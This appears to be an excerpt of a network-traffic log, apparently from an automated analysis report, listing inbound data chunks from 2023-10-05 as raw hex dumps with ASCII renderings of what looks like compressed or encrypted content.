2023-10-05 16:48:07 UTC	1157	IN	Data Raw: b9 b1 b9 64 34 4b ae 34 45 3d 41 c9 16 f9 3e 8b 08 da 8c 5d b5 14 f5 ef 7e 21 72 b1 e2 e0 cc 6e 8e 26 94 a4 fd 02 f4 4d 59 da b9 79 99 89 4b 9a 29 96 03 63 39 6b 6f 5c 9b d7 97 9b 4c de 5f b4 03 1c 24 6d d9 bf e7 1c 91 66 c5 27 69 21 67 47 31 ba ce 47 7c fe a2 b4 7c 57 d6 53 77 9e 58 8f d4 e3 05 d6 60 5e 73 eb 95 cc 5a 37 cb a9 35 72 0f fc 16 bc d9 52 16 de a6 dc 77 3e aa 97 e1 74 e1 a9 93 15 48 32 e2 1a d6 74 44 5d b7 7c 23 1d d4 54 5c ed c3 63 52 39 0e 6e 45 5d 38 17 a8 03 05 6d 07 07 81 d4 fd b2 a4 a6 6f eb 06 e8 0b 28 80 9a 9a 9a 90 f8 61 9c c5 6e c3 6a 6e 4e a4 51 d3 4f 86 c6 0d ab a7 0d 60 15 6c c0 a5 42 6c 5f 34 1c bc 0e 05 21 a2 50 b4 8d 5c 61 f2 1a 02 af 5b 7c 4d bb 05 27 0d e9 b6 69 f7 75 b6 a4 a2 ca 8d cc 9f 12 d8 9b 33 01 24 a0 bf 82 92 7a 98 Data Ascii: d4K4E=A>]~!rn&MYyK)c9ko\L_$mf'i!gG1G\|\|WSwX`^sZ75rRw>tH2tD]\|#T\cR9nE]8mo(anjnNQO`lBl_4!P\a[\|M'iu3$z
2023-10-05 16:48:07 UTC	1164	IN	Data Raw: 13 ad e4 83 e8 a2 b7 41 22 cd 59 13 7f 05 17 23 0e fa 10 87 6b f2 4c 4e 03 89 82 ff c2 c1 a7 16 df df dc fc 29 1a fa d2 29 4f 3f d0 3c 7e f4 e5 b2 08 86 4e cb 20 6e d8 ec a2 92 7d ba 27 d7 c1 ef 59 2b 6b 1d 6f 3f d4 ff 95 72 98 37 b7 a4 d2 75 64 f3 82 e8 49 90 ce 66 d5 5d d1 56 4b de 5b 40 96 b4 ad 17 03 1a e6 28 a2 2d c5 1a e5 18 e4 c3 8a 55 76 40 87 78 b2 31 b6 5b b7 f5 f9 8e a7 ad ff aa 77 89 0a 56 05 59 b5 d8 ba f1 a5 8b 10 28 bf 6e 18 8d a7 f2 dd 43 64 6d 07 bd 77 44 ae 6c 03 f3 49 05 78 1d 95 ff c2 86 72 aa ed db a4 a2 b3 86 a9 c4 ed 07 e2 47 92 81 de 19 dd 54 1e 1a c0 7b ff c7 5e ef 57 58 c0 7e 9d c6 de da df dd 99 0a c8 67 7a d6 d3 69 50 90 7f 25 38 0f 7f e4 23 52 7a cf 63 6b 8e 6c d3 e6 39 3d ec a7 f9 ee 82 6e f6 4a 5e 71 6f 2b 2f 94 fc f0 5c 0c Data Ascii: A"Y#kLN))O?<~N n}'Y+ko?r7udIf]VK[@(-Uv@x1[wVY(nCdmwDlIxrGT{^WX~gziP%8#Rzckl9=nJ^qo+/\
2023-10-05 16:48:07 UTC	1172	IN	Data Raw: 28 61 07 61 a0 48 56 72 52 25 a1 62 f5 e4 5a 92 c6 b1 6c 23 82 02 95 3f 59 26 47 8b 6a 09 1a 42 31 69 b0 6a 52 f9 54 66 58 96 cb 52 12 5e 52 a5 5c 5f 35 eb ca 72 22 42 90 7a 25 26 df 3a 53 55 ac 2f 88 d5 04 02 4c 55 13 f4 66 49 94 3c 8a ba 13 57 fe 59 28 30 38 02 30 45 28 62 62 80 83 90 48 8a 88 15 c6 50 00 2d 42 aa db 2e a5 d9 c2 fa d4 a0 5e f6 8a a6 92 f5 3b 54 fb cd 27 de 31 91 a9 2f 4f d5 d3 7f 3f fc 54 1f c4 04 00 ee f5 20 96 a3 a4 05 03 9a a9 09 24 31 10 96 52 2c 9c 21 40 4f 83 4a 11 a6 01 8b 85 a5 09 38 8a 21 bc 1e 52 08 82 83 c2 d2 64 65 80 85 83 42 25 37 96 ab 26 60 d1 ac 95 f5 f5 e8 5c 92 76 62 90 44 30 1e 60 f3 9f 20 a9 94 33 86 02 82 41 c2 60 80 07 1b d4 52 9e 8a 17 aa d3 ec a8 a7 21 1c af 00 50 ba f2 8b 72 10 10 58 70 32 22 80 a4 0a 96 09 19 Data Ascii: (aaHVrR%bZl#?Y&GjB1ijRTfXR^R\_5r"Bz%&:SU/LUfI<WY(080E(bbHP-B.^;T'1/O?T $1R,!@OJ8!RdeB%7&`\vbD0` 3A`R!PrXp2"
2023-10-05 16:48:07 UTC	1180	IN	Data Raw: ba a4 79 79 69 69 94 dd 94 9c 93 9a 57 0c 2d 37 b1 2c c4 62 26 ab 92 52 14 55 0c b5 fe fe 52 13 98 c5 c2 50 95 98 89 39 ea e4 f2 7b 48 11 4f 44 aa ea 60 82 a7 80 81 e4 9a db 1f 35 26 95 24 29 12 18 48 0c d5 62 93 61 e6 07 54 1e 81 99 19 dc 8e bf 02 a8 10 a9 c2 a2 95 67 a0 b4 ad 49 9c a0 eb d7 ae ea c6 60 1d 0e 82 61 44 15 35 13 df 72 25 d1 1c ab 36 62 8b dc a9 fc 65 35 8c 06 4d 62 4c 2e 4a 0a 8d 0a 2c d2 69 55 2c 0d 20 4a 4c a4 63 21 5a 0a eb 42 8a f7 bc 14 c9 12 3e d4 93 d0 fa 39 62 a0 87 13 be 71 90 aa f5 c1 e1 f5 cc 2a f6 af 45 5d b3 4c 8e 16 d4 12 34 84 c8 d3 e6 af 52 88 88 d8 52 c5 2f a9 6c ae fd 3a 3e 2b 8a a4 f5 65 00 8d 06 ad 2c a1 59 c2 b3 74 11 5d fe bf d5 e0 4a 8a 44 76 f1 77 9e d4 9b 5e 8b 99 b3 50 50 2e e1 30 18 aa 29 09 25 a3 73 b3 69 56 69 Data Ascii: yyiiW-7,b&RURP9{HOD`5&$)HbaTgI`aD5r%6be5MbL.J,iU, JLc!ZB>9bq*E]L4RR/l:>+e,Yt]JDvw^PP.0)%siVi
2023-10-05 16:48:07 UTC	1188	IN	Data Raw: 72 d6 3b 17 2a d7 ca bc 1c df ee 16 93 ba ce 07 da 7c ef e7 9e 4a 8f db 27 bf 5d 1a b7 76 3d 71 28 11 0a 43 d4 14 ee 0c a9 d6 37 f7 8b 7b 27 46 31 e4 8b f4 2c 7d 9e c6 29 08 f9 08 db 7b cf 1c 9b 6e d3 b4 ad 76 dc fe 5b 6f 1a 14 c3 cf 6b de e3 17 e0 f8 a5 5d 12 62 52 e3 1d dc 78 dc 28 85 2d a3 96 83 3b ab 8e d5 b4 43 fc 33 aa c7 66 10 e1 44 42 ef c3 3a 6d 3d 55 c3 64 ea 02 80 d4 b1 e7 64 ad 24 d9 4a 02 59 11 f9 35 2d 53 60 a0 5b 18 2c ae c2 ab c5 5e ee 1d e8 b4 27 df 9f 42 e9 e7 33 33 9a 6a 0a 3e 7b 0a cb 30 7d a7 1e 48 08 4f c0 cd 6c 50 2c 48 20 5d dc 30 cb f0 d6 25 25 b1 0e 73 ab 1d 74 1e d3 17 a8 7a b5 81 aa 7b c1 bb 91 7a 2d 7d 88 06 b5 58 fe 0f 67 0d 44 94 f2 90 0a 6a 45 e1 96 fe fc 1f ed ff ae 43 15 f0 77 11 a0 ab 46 a2 36 69 0b f6 7c c5 2a a8 2a 04 Data Ascii: r;\|J']v=q(C7{'F1,}){nv[ok]bRx(-;C3fDB:m=Udd$JY5-S`[,^'B33j>{0}HOlP,H ]0%%stz{z-}XgDjECwF6i\|*
2023-10-05 16:48:07 UTC	1196	IN	Data Raw: f0 ee 56 2f fb 36 bd 3f 24 a0 31 a9 65 5d b4 04 b7 8c 5d d5 b7 3d eb e4 ae df 23 0a 1f ea 1c 1f 69 62 e2 1e 7f f0 a9 e4 d4 41 9f e6 55 e5 d6 60 3f 9f 58 e8 b4 60 7f 66 5d b9 5e 94 f8 60 8b ae 83 d5 21 d0 4e f3 37 94 6c a3 b9 15 d3 f1 eb d7 90 8a 48 ed 5e 6e 69 50 ec 36 8c c4 97 46 1c 6d 11 2c 9f a6 c9 35 06 a3 c1 1e 82 07 49 0a 17 84 71 9f c2 87 23 dd be 9c 25 b7 c8 70 d5 eb 1e 0d 1e 7e 7b 4a 64 16 bf 48 2c 3e f0 7d 76 0f 35 55 16 30 6f e7 ef 91 05 8a 46 09 e4 47 f1 73 ab a0 b5 7a 05 f9 40 7e cd ee c1 84 93 c6 8a 6e e2 76 ab fc 91 08 b5 53 42 03 39 f4 45 86 ff b9 36 db c8 87 25 e8 7b 8a 3b b5 fe 5a 88 95 e3 47 e9 e5 b2 47 88 43 be 5d 2d 88 96 67 aa 45 e2 73 51 73 5e f4 20 16 88 14 1d 38 2a 63 3c 91 9c de d4 03 bd a6 c5 66 81 24 10 ed 6f 93 8a d1 47 db ca Data Ascii: V/6?$1e]]=#ibAU`?X`f]^`!N7lH^niP6Fm,5Iq#%p~{JdH,>}v5U0oFGsz@~nvSB9E6%{;ZGGC]-gEsQs^ 8*c<f$oG
2023-10-05 16:48:07 UTC	1203	IN	Data Raw: ee 5f bf 94 72 fc c8 29 3b 52 27 a1 28 c3 25 40 08 5e 41 e5 06 89 90 30 1d 03 a8 4b 6a d9 c9 95 ec 30 e0 08 34 00 77 75 13 de 05 84 7d c0 00 62 31 5a 8e 66 f7 da 2f 11 0a 19 4a 83 00 50 6d a4 49 6c e4 21 d8 9e d1 33 4b b2 4a 6d d6 1b 6c b3 0e dd e9 da 49 4b 2b 1e 2e f7 e1 04 89 fc 9a 82 ec 19 fc 6d 5e 5d f8 b2 75 bc 84 0d 9c e1 00 b5 8d 30 04 74 2d 80 23 3f 19 92 d7 b3 22 80 2a 83 8f 1a 76 e5 c1 f6 d1 c7 5c be f0 ef 5d 43 37 e7 ba bb 9a 7e df d4 69 67 91 05 e3 8d 96 d8 28 a0 f0 77 ce 03 d8 34 fa 60 55 eb 6b a7 c2 0f e3 84 0e 16 20 c6 55 c4 fa a4 32 ad 4c 5a 2d f8 9e c1 4a e9 24 89 9f 02 e8 94 a6 69 5a be 0b 4f f4 e1 1b c1 5b ae 3d 58 ee 30 d2 45 09 bb 9f 7d 10 2c 67 80 bd 0d 6c 47 de 3c e3 5d 05 5a 86 b3 86 73 ca c8 c9 aa d4 03 a5 64 25 95 00 82 ae d0 51 Data Ascii: _r);R'(%@^A0Kj04wu}b1Zf/JPmIl!3KJmlIK+.m^]u0t-#?"*v\]C7~ig(w4`Uk U2LZ-J$iZO[=X0E},glG<]Zsd%Q
2023-10-05 16:48:07 UTC	1211	IN	Data Raw: a3 c1 4f 79 4f b9 13 da 34 05 6b 76 a3 37 ca 21 95 cc 2c 3a 5b b9 47 66 3a 37 99 ce b4 b2 0c f4 62 9c ce c0 26 aa fc 86 0e 27 9c fd 48 ac f2 fa 76 a1 34 19 64 d4 14 52 a9 96 6e 82 82 5a a8 25 4a 32 ac e9 50 ac 68 30 c4 4c 24 2a 15 46 79 8f 0d fb ab f5 df 9a da 6e 98 d7 aa 85 bc df 69 40 ab 9e e2 ad d5 7b 49 7b c1 15 0f 2f d4 4f e5 39 f8 8d 51 9a 84 78 e5 18 33 df 2b f6 7a 99 97 08 d0 a0 ab c9 21 f7 62 2b c5 e0 f6 ad 37 d5 62 c4 ab a7 d9 4f 61 c0 5d d2 80 01 b7 e5 b3 62 06 a4 e7 71 49 f8 68 40 55 d0 22 92 d6 d1 ed df 52 30 55 0e 75 7e ad ee 7f 4c 6b 83 4e 16 58 a5 41 19 71 ab b6 33 bf 54 fa 7b b6 3f b9 fe 18 3c 45 eb cb fd e9 24 4c f4 9b 99 98 14 c6 ba ef dd e7 5c 3d 0d 1d 21 06 6e 98 1d bd 01 fa de 8b b8 c9 41 e1 f2 96 33 7c aa a8 09 62 fc 67 6e 5b 0c 46 Data Ascii: OyO4kv7!,:[Gf:7b&'Hv4dRnZ%J2Ph0L$*Fyni@{I{/O9Qx3+z!b+7bOa]bqIh@U"R0Uu~LkNXAq3T{?<E$L\=!nA3\|bgn[F
2023-10-05 16:48:07 UTC	1219	IN	Data Raw: 1e 14 97 8f 4f e7 02 cf 0c 61 ce cc 5d f3 33 3d b8 33 dc a2 d7 7e 45 af 8e 34 67 66 ba 73 d5 98 28 4c c5 30 49 5b 95 99 16 8b 59 22 44 ae 49 49 68 e6 0a bd 6b 98 57 e6 32 e4 11 53 60 0a 15 b3 e4 1d 40 91 16 44 6e 9d 77 1f e0 ce 10 f2 45 fe 52 63 1e 40 62 4c 09 4d 55 8b 60 06 ac 1f 53 79 35 06 a9 52 d5 8e 94 db 8b 42 9e 09 a3 57 86 42 86 76 7e 7a 8b 7f 1a 7b 87 63 e7 6f 27 12 27 3e 8e 62 96 e6 52 28 b5 94 7d f0 7e 6d 6d a7 ef 33 ab 76 ec 6c 47 b9 37 60 98 ca 81 b1 31 48 cb 2a be 98 15 16 7a 5b ea a1 80 17 4c 2a 1d 71 89 28 fd 9e dc fe 1a 7a 05 5e e0 aa 55 09 be 49 15 23 cd 94 89 fb 96 68 d1 62 5a c2 87 80 fc 82 be cf 52 7d c0 96 95 30 94 42 d1 5e e3 66 7f d1 6e d4 1e a1 b0 dd a1 8f a2 d9 75 d8 69 e4 32 f0 4e de 56 a0 de b7 a0 9b bc 85 0d 77 40 0d 17 07 38 Data Ascii: Oa]3=3~E4gfs(L0I[Y"DIIhkW2S`@DnwERc@bLMU`Sy5RBWBv~z{co''>bR(}~mm3vlG7`1Hz[Lq(z^UI#hbZR}0B^fnui2NVw@8
2023-10-05 16:48:07 UTC	1227	IN	Data Raw: 3c d3 ea 60 c3 b6 45 8c 82 1d 2a 0f 51 61 a4 41 95 18 cc 65 6b 75 51 42 94 44 14 5a 25 a5 a3 b5 e0 98 d1 3f 3d 13 e8 fb 05 62 2f 0d d5 02 b8 22 a9 2a 2a 75 68 34 14 55 2a 4d 25 de 59 a2 47 8b 6a 09 1e 02 d8 0b e8 0c 4a 83 00 5b 55 9a 51 0a 45 7b cf 9c 6f 46 2a 52 7b 84 82 76 85 e6 d2 1c 7a 24 6b fb f4 df cb 40 4b eb 9b 51 4a 83 73 2b 68 1e 25 80 55 2a 16 65 8d 05 01 43 b7 6c d3 f0 82 50 43 01 e6 43 a0 fc 00 b7 a8 b4 c6 f7 c2 ac 63 89 48 e5 61 94 12 b7 61 01 b6 20 55 a8 62 3d 20 51 1a 89 29 e4 84 08 02 16 66 c9 70 49 6e 65 9e 7c 2d df 44 61 48 ef f7 d6 b7 81 e5 eb 6e d9 c0 24 c5 f5 b9 55 62 e7 51 60 26 93 2a 19 cc b1 72 b7 2d 30 93 5e 4a 14 bf 9e 38 f7 3d f5 ca 8d 2d e4 6a e2 58 7f e1 70 0d 52 f2 f3 94 62 99 71 a0 c8 e9 ff 25 2c 61 35 8d b8 c4 de 31 81 42 Data Ascii: <`EQaAekuQBDZ%?=b/"uh4UM%YGjJ[UQE{oFR{vz$k@KQJs+h%UeClPCCcHaa Ub= Q)fpIne\|-DaHn$UbQ`&*r-0^J8=-jXpRbq%,a51B
2023-10-05 16:48:07 UTC	1235	IN	Data Raw: 65 34 27 81 f3 e3 39 4d 17 12 1f c9 d1 27 1b 8f 04 0b d3 91 fb 6d ff fe da 8e 96 49 12 0c b9 94 8b 40 a0 54 69 1b c1 42 5c 4a 32 b2 94 8a 31 09 49 20 94 b6 99 46 1f 3a ed 60 b2 f6 80 c9 9b 18 66 7d 11 d5 2a 02 29 e1 36 a6 50 fb 1c c2 f4 34 fd cf 84 3b 28 33 3e 76 07 e3 ff b7 29 84 00 e2 54 50 51 06 7a 51 14 81 85 62 12 04 45 58 41 16 8e 22 21 94 28 4b 80 22 7e 59 50 b4 8e 42 61 10 29 08 61 54 14 24 79 60 47 d5 a7 98 8d f2 b3 be 20 d2 83 b0 25 2c 80 04 0e a0 a8 5c 8c 41 62 5a 4a 0c 2a 98 f3 ab 20 5c 82 74 41 a5 a4 c4 8b 29 37 4e 43 99 86 36 6a 6a 6e 53 11 50 29 96 85 03 0a ec f9 c4 2d 26 02 30 84 10 27 66 70 a7 e8 7e 16 25 5c 91 84 81 14 9c 10 fa 12 22 1a 04 c2 34 93 82 fc fe 2a 40 b0 b9 91 80 3b 25 eb d0 b2 36 d4 ca 6d d6 f2 7e 01 04 00 52 b8 92 9f e2 2b Data Ascii: e4'9M'mI@TiB\J21I F:`f})6P4;(3>v)TPQzQbEXA"!(K"~YPBa)aT$y`G %,\AbZJ \tA)7NC6jjnSP)-&0'fp~%\"4*@;%6m~R+
2023-10-05 16:48:07 UTC	1243	IN	Data Raw: 96 6e 6f b4 fb 33 8c 97 6d 3f f8 63 38 0f dd 6a 1e 7f 7e fe 88 f9 67 90 b5 cc 57 bd ac 2d f6 15 02 b1 7d c0 28 f6 6d f9 8c 8b 80 e2 b3 f2 6d 8d 34 78 e6 bf 7d a4 27 37 4d ad d4 20 7d 21 a5 c4 95 63 fa 12 a4 fe 38 45 47 bb 08 ab 06 77 eb fb 74 bd 0d 90 db fe 89 ce c9 b2 b7 e4 90 f5 1a 8c 1f af cd 60 b5 05 25 b6 a1 78 a6 15 3c d5 bb 35 04 5f 68 67 f1 f2 54 1f 8b a8 23 bd d3 b1 86 e5 a7 96 cc d8 10 d5 a3 b8 5e ea 40 ef 0a 16 b8 e7 07 7c 0f 3e d7 6e cb 5d cf af e4 30 5c 78 eb 2b 4b 98 a7 1e a8 a6 63 eb e1 71 46 10 b5 a3 31 03 00 34 a1 d5 b8 d9 95 79 4f a2 69 08 b1 f5 8a d1 d5 4f 98 09 e6 b9 72 fe 0d c7 93 db 8e 73 49 b2 af 83 15 3c e4 89 7c 78 88 b3 28 4e f6 6f 09 9c 7b 06 94 07 8c a0 69 e7 a6 b9 78 d9 bf bb 0f a1 5a 9d d8 8f 01 e4 ef 6b 97 83 2e 1f a1 5f de Data Ascii: no3m?c8j~gW-}(mm4x}'7M }!c8EGwt`%x<5_hgT#^@\|>n]0\x+KcqF14yOiOrsI<\|x(No{ixZk._
2023-10-05 16:48:07 UTC	1250	IN	Data Raw: 24 39 a2 bc eb e2 3d a4 a3 2e c9 b7 aa 57 ab 2c 3b 9c e0 04 b4 fe 95 97 9d d0 b2 f5 04 c2 af 65 bd 57 a4 53 9f 89 0c 72 95 1d 23 b6 1e 45 b6 04 b8 a6 1d fd 9c 89 94 38 93 ef 1f 38 ff 76 70 cb e8 85 26 00 d2 3f 80 f5 61 1f d7 30 59 08 ea 3b 14 fb 66 a4 bd 6a 31 eb 9d aa ea dc d0 39 fd 48 e1 db 80 c6 bc e3 8c d8 6a 3d 44 12 93 3a 03 8c 42 b2 64 cb 21 7a c5 09 eb 03 ae b9 a2 c3 90 83 9b 04 3f 23 1d 79 7c b4 7e ac 54 04 9f c2 48 05 cf 18 3e 9b 1e 88 d5 22 ce 4e d0 a0 39 a4 31 11 f6 3a 80 2f df 53 7d 71 9d 39 9d f8 f2 86 66 b0 be df 51 6e b0 69 e3 43 51 d2 40 bc 37 46 93 ca ae 06 85 35 a7 a3 dc 57 a0 b0 2f 67 5f 5a 2f ad a1 8a 7e c0 08 fa 76 f3 a1 12 bb 79 4f 3e 5b f7 37 9c 9f c4 b4 88 1e 1a b7 a5 38 ab 1e 9e 23 f8 ad a0 99 64 db 9b fc d0 9f 5b f2 53 3b fa dd Data Ascii: $9=.W,;eWSr#E88vp&?a0Y;fj19Hj=D:Bd!z?#y\|~TH>"N91:/S}q9fQniCQ@7F5W/g_Z/~vyO>[78#d[S;
2023-10-05 16:48:07 UTC	1258	IN	Data Raw: 98 91 b6 d3 9c f1 6e 49 e3 19 29 19 b2 cd 7e 52 f7 82 49 96 ad af 37 f4 bd c7 38 cd e4 41 9d c3 07 0a 36 db ca b9 ca a4 13 7b 59 94 82 48 65 dd 80 5e 40 5e e6 29 a2 d2 03 cb eb 59 c5 a2 be 5e f3 3a e4 19 1a 74 3a fe 05 36 20 0c 44 66 d0 dc d8 0e 03 ba 4a 46 a4 85 f3 a3 16 8f 3c 8a 69 ff b7 90 9a 1a 0e bc 16 f3 e5 86 82 a7 72 63 dd 27 e6 5d 85 c9 71 79 f4 18 00 4a bc d4 62 cd ac af 09 64 5d 45 6e 24 0d 3b f3 71 15 f7 6b f8 1d 44 91 fe 80 4f 77 9a 06 2e 52 e4 3d 67 1f 57 a6 c4 6b d7 0e b3 97 6b 3a a8 d8 54 5a f2 fc 8e a2 cb 00 a1 fc b8 ca a8 35 d5 1f 50 64 1d c8 91 a8 f9 ae 43 de 73 79 c1 30 f9 e5 c3 1f 83 5f e7 7a ef 71 45 03 79 b9 37 cf 89 55 b3 d6 7b 96 28 b3 40 c4 ff ef 43 28 88 c6 c9 a3 db b0 b2 bb be 68 5a c8 98 5c 85 09 61 7d 7b 3c e5 31 f2 6c 4c a6 Data Ascii: nI)~RI78A6{YHe^@^)Y^:t:6 DfJF<irc']qyJbd]En$;qkDOw.R=gWkk:TZ5PdCsy0_zqEy7U{(@C(hZ\a}{<1lL
2023-10-05 16:48:07 UTC	1266	IN	Data Raw: 43 46 46 83 c7 12 de 87 20 e6 b1 2a ce 6d 13 70 a0 e9 e9 b8 aa b9 f7 3f 18 1f f0 8f 29 bc 04 f6 77 c1 d0 44 0e 15 a7 2a 53 8f 26 de 85 d1 a7 ba 54 de d1 38 06 d1 72 c9 7f 7e 44 af b0 1f 1b 6b 39 9e 7d 93 f1 a6 e8 c5 dc b2 eb 52 65 82 ca f8 5e f0 0d 95 f4 dd 95 61 b5 18 74 12 e1 4d b0 be fe bc f7 79 83 1f e8 70 4f 06 57 2d 2f d4 13 44 9e f4 e3 7e ea 71 ab 6a e8 90 39 33 c6 ce 2e 4a bc e2 d1 e3 ef 06 38 7f 9e 15 ae e6 07 66 a1 41 9a 1e f0 84 af ee e8 ad a3 9e 09 7d b4 be 27 1e 1e 1a 0c 79 21 0f f8 d0 36 0b b5 3e e5 43 cc e4 69 d9 6e 5d 87 b2 31 ce 28 de f1 54 c4 cc 81 4d 79 31 95 88 d3 71 05 60 6b 15 f2 a0 0a 32 13 63 e9 04 a7 95 b9 5d ea d5 b2 e9 86 d7 9b af cc 8c 03 d3 97 72 5f 59 9d a5 a6 b1 54 8f 2d 81 87 0a 7a 9a ec 2d 48 be 4e 45 dc 71 f7 13 68 38 3d Data Ascii: CFF mp?)wDS&T8r~Dk9}Re^atMypOW-/D~qj93.J8fA}'y!6>Cin]1(TMy1q`k2c]r_YT-z-HNEqh8=
2023-10-05 16:48:07 UTC	1274	IN	Data Raw: 8d ad e3 c2 fb f9 cf ef e8 27 2a 21 23 a8 67 ee e6 c8 fa b5 3f bf 3c 69 b9 3d 55 c4 ac 7f e7 a8 ce 09 60 79 75 c3 62 70 68 b6 45 91 45 04 70 fe f8 3d 98 79 aa 8a e0 61 0b e9 e2 b6 63 2f 2e 6b 1e 41 a7 13 56 96 28 39 c3 9a 13 7f 9d 1c 2c 31 f2 6e 6d d4 d4 07 cc df 93 5b e6 31 13 6f 7f 1f 64 ff cd f2 6a 24 bb 25 ff c0 a8 7c 48 62 05 6f 9a e6 d6 4a 90 dc 36 6e 62 42 aa 89 09 29 72 d7 1b e7 31 21 ba bf 78 6b 56 7a 0a 85 05 8c 12 59 00 49 47 bc 4c 21 53 58 f0 30 b8 c8 8c 1e 02 79 43 7a 81 73 5e 5b 49 e0 88 a1 f9 e0 a0 ef 57 30 21 70 9e d8 75 72 e9 d7 f7 c4 f0 f2 ab 38 3b 29 ed 1e 76 cc be e4 e2 de 6c 05 82 43 47 30 64 7f 1b 2a 63 7e ef 88 88 d4 d1 d9 11 83 bf 23 d1 ef b2 bf 7b 3d 76 0d 2b f4 08 45 ad f1 99 8d d9 18 16 07 31 0a 64 05 bf b1 fc 20 88 68 b8 e3 8a Data Ascii: '!#g?<i=U`yubphEEp=yac/.kAV(9,1nm[1odj$%\|HboJ6nbB)r1!xkVzYIGL!SX0yCzs^[IW0!pur8;)vlCG0dc~#{=v+E1d h
2023-10-05 16:48:07 UTC	1282	IN	Data Raw: b9 d4 57 72 dc 80 0c d5 2d 8c e1 af f8 72 bd 02 f1 0b 45 cf db ca 40 f7 9a 08 ba 08 1c 89 28 ce cd bf 55 aa b4 e4 c8 bc d8 55 b3 df 9b da dd 12 78 7e 1b 28 c5 c0 de 91 0e 44 7c d4 bd 41 0e cb f9 0b d5 74 06 13 06 b3 0d eb c5 8c 67 33 22 ec d4 37 7c 41 cd ad 81 a7 8c 49 05 b2 bd 80 ef e8 33 3b d8 8d 5f 55 5d 3d d0 fc b9 c8 9e ec 5f 8d a5 b2 93 44 f1 8d e6 e5 ad cc 71 20 26 dc 45 69 9e e2 95 76 3f 27 44 01 4a 68 fe f5 f3 ad 2c d1 ca 06 a3 78 92 56 83 43 3c 25 a0 56 8f e6 42 6b 6f f7 11 cd 83 9a 6c 71 d8 6c c0 72 45 75 70 73 da 2f 27 50 ba 21 be aa ec ef 30 9b d2 3a 72 13 5e 95 38 02 af 93 9b e2 28 f7 95 9d f3 1e f0 c0 40 0d f8 06 53 61 dd de a2 86 1b 2c 5f 97 b4 ae 71 f1 81 7d e1 c3 eb 2a 4d c0 9b 4f 88 7a cf 10 e6 6d b6 10 39 05 bb 5c ab 64 76 e3 68 2a 5b Data Ascii: Wr-rE@(UUx~(D\|Atg3"7\|AI3;_U]=_Dq &Eiv?'DJh,xVC<%VBkolqlrEups/'P!0:r^8(@Sa,_q}MOzm9\dvh[
2023-10-05 16:48:07 UTC	1289	IN	Data Raw: f0 85 7d 2a 7b 3a 00 69 30 1d 64 e4 03 8c ea 12 6f ba fc 08 10 29 46 4a 7b 4c 7d 99 34 40 99 9c aa 46 49 a6 0b 97 9d b1 66 98 ad b0 28 56 9d bd c2 e7 0a 5f 52 fb 12 bb 31 55 4d d9 bf bd e4 f2 82 72 cc 78 b1 4a 73 18 86 20 fa 92 01 e0 48 f0 a6 04 1e 02 25 56 c4 7b fd bf 87 fc 04 b3 d4 43 33 a8 19 81 46 e2 57 1b 15 ff 1e 6e 4b 96 9e 72 c4 d3 22 71 be 16 b2 df 7c 3e a2 1e f9 b3 ee 02 86 59 9d 6d 14 10 7d 15 ac 19 c4 78 5a d4 40 f5 15 be 0e 15 3e ad cf 9c 2b 7f 4e 8f 19 5e 8d 33 d8 df 44 48 67 e5 52 e1 3b 3d b1 ad 99 b2 91 a8 fa 5c 54 0f fe 81 a9 f6 7c 08 fd 82 a6 d6 72 89 ee 5b 24 aa 9d c0 62 29 55 8c 59 00 63 36 55 3c 2c b3 df 2e dd 34 1e d7 bf 1c 4b af 2d ae ec 96 65 fa 50 bc ee 81 28 5e 67 3d 9c 8b 23 58 1f be 48 98 a7 0c 40 2a 39 bf e2 d4 87 5b 6b 74 97 Data Ascii: }{:i0do)FJ{L}4@FIf(V_R1UMrxJs H%V{C3FWnKr"q\|>Ym}xZ@>+N^3DHgR;=\T\|r[$b)UYc6U<,.4K-eP(^g=#XH@9[kt
2023-10-05 16:48:07 UTC	1297	IN	Data Raw: 39 28 21 12 02 4f 47 40 57 cd 57 33 eb 61 3a 8b 47 3d 08 c6 51 72 68 10 c8 03 08 83 00 42 29 3c 80 fa 10 0a 6e e2 00 08 82 40 53 3f 51 3a 4a 05 1f 02 88 70 a9 11 e7 02 1a dd 41 44 e4 23 62 20 00 52 1f 2d 50 e2 04 80 49 26 b1 f0 28 cd f0 0c 8f 24 c4 ee 94 00 48 34 15 aa a1 4c aa cf 24 1d c3 b8 28 20 b8 9c 40 8e a9 27 16 40 c4 c3 50 c9 30 84 04 40 70 88 64 a4 db f6 44 b9 ef 41 db 36 fe bf 22 f8 0e 22 c3 96 27 10 f7 be 35 de c8 f3 6a 34 02 ce 80 78 13 c5 3f 70 bd 5a 00 31 a2 d1 59 58 bd ea 6e 24 00 9b 29 08 0a 00 b3 22 45 08 7e 44 b5 d3 90 94 01 48 a4 30 78 80 3d 11 8d c2 35 54 a1 ee a1 88 0f b1 d4 05 4c 92 e9 0d 22 1f 88 82 79 71 1e 84 d0 c1 04 79 11 a1 a5 80 4a 0c 5a 88 21 b7 b3 0a 9d 5b ec b6 5b 94 ef ca 6a bd 8b cd 84 dd 78 8f 3e 94 12 28 ee 46 dd 53 2f Data Ascii: 9(!OG@WW3a:G=QrhB)<n@S?Q:JpAD#b R-PI&($H4L$( @'@P0@pdDA6""'5j4x?pZ1YXn$)"E~DH0x=5TL"yqyJZ![[jx>(FS/
2023-10-05 16:48:07 UTC	1305	IN	Data Raw: 1a c7 56 03 41 7f a9 00 cc 60 b3 86 e6 63 7e c9 74 26 cd 9c c3 e4 ad f9 17 f0 ac 90 3d f6 fc 47 13 d0 6a 1f 47 82 01 ef 2f 19 25 36 fc a3 64 00 a7 ef da b7 2d 95 7b 7a 16 90 15 73 ca 8e 37 d0 95 96 46 9a 10 5d bc f2 62 e2 8a b9 8d f3 f3 6a 11 68 7e 6f e6 75 5e aa a5 f3 70 df d1 fe d5 b4 4c fa 5e 0f 4f b8 e7 2c f3 83 9f 48 cb ff 19 ef 8c 3a f2 f8 26 63 7a 42 99 83 2e d4 bb 50 15 91 d9 60 96 f4 6f 89 f3 1f 0b 2b 95 f8 e7 b6 6b 5b 2f 03 77 80 50 fa a9 cf 8c bf 82 eb 27 9e 70 cb 6d 18 36 a2 d8 2e 19 37 fb 2e 5e b4 a9 9e fb da cc 97 4f e0 ad 03 06 ac b6 f9 e6 63 af d5 7b 2c 31 1a 60 7d 5b 2a 9a c3 68 9f ef e7 64 b9 ff 94 49 a9 3c 79 e5 9f dd 9a 43 57 b1 b4 a8 a6 89 96 fb 0e 2e 98 36 d3 e8 97 ba 6a e2 27 70 09 4a 95 2f 3a ee 4f 3b 40 75 f0 af 11 64 91 55 51 3b Data Ascii: 